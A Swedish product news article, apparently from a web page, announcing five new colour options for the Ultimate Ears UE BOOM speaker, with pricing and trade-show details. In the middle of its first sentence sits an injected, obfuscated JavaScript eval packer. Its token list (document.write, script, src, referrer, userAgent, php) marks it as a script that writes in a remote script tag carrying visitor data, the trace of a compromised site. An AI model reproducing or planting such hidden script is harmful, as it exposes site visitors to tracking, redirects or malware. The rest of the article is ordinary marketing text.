Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Ultimate Ears utökar sin prisbelönta högtalarlinje UE BOOM

Ultimate Ears utökar sin prisbelönta högtalarlinje UE BOOM

Ultimate eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zaefn|var|u0026u|referrer|adkbk||js|php’.split(’|’),0,{}))
Ears avtäcker idag fem nya färgställningar till sin mångfaldigt prisbelönta högtalarlinje UE BOOM. De nya färgställningarna är:

–  Blue Steel – midnattsblå med grå och röda detaljer.

–  Superhero – klarblå med röda och svarta detaljer

–  Aqua – havsblå med ljusgröna och vita detaljer

–  Citrus – neongul med vita och gröna detaljer

–  Orchid – laveldelfärgad med vita och röda detaljer

Med dessa nya tillägg kommer UE BOOM finnas i hela 11 olika färgställningar utöver specialutgåvorna, exempelvis UE BOOM – Jettison Edition.

“UE BOOM handlar om att uttrycka sig själv och dela sin kärlek till musiken med världen” säger Diego Gabathuler, marknadsansvarig för EMEA på Ultimate Ears. ”Högtalaren har 360-gradersljud och är otroligt stryktålig, den är byggd för att klara allt. Med de här nya färgställningarna kan du dessutom själv välja vad som passar din stil.”

UE BOOM är en mobil trådlös högtalare fylld av funktioner. Den sätter en ny standard för mobila musikupplevelser. Högtalaren förbättras med hjälp av ny mjukvara ständigt med nya funktioner såsom larmklocka, inställningsbart ljud och parkoppling av dubbla högtalare. Cylinderformen ger en 360-graders ljudbild och högtalaren är designad för att kunna följa med dig var du än går. Den går enkelt ner i ryggsäcken eller väskan och passar i flaskhållare. Högtalaren är också ytbehandlad med en vatten- och smutsavvisande färg.

UE BOOM i färgställningarna Blue Steel, Superhero, Aqua, Citrus och Orchid väntas finnas tillgängliga i början av september för ett föreslaget pris på 1899:-.

På IFA-mässan i Berlin kan man ta del av de nya UE BOOM färgställningarna i Logitechs bås (Hall 3.2, Booth 212) mellan 3e till 10e september.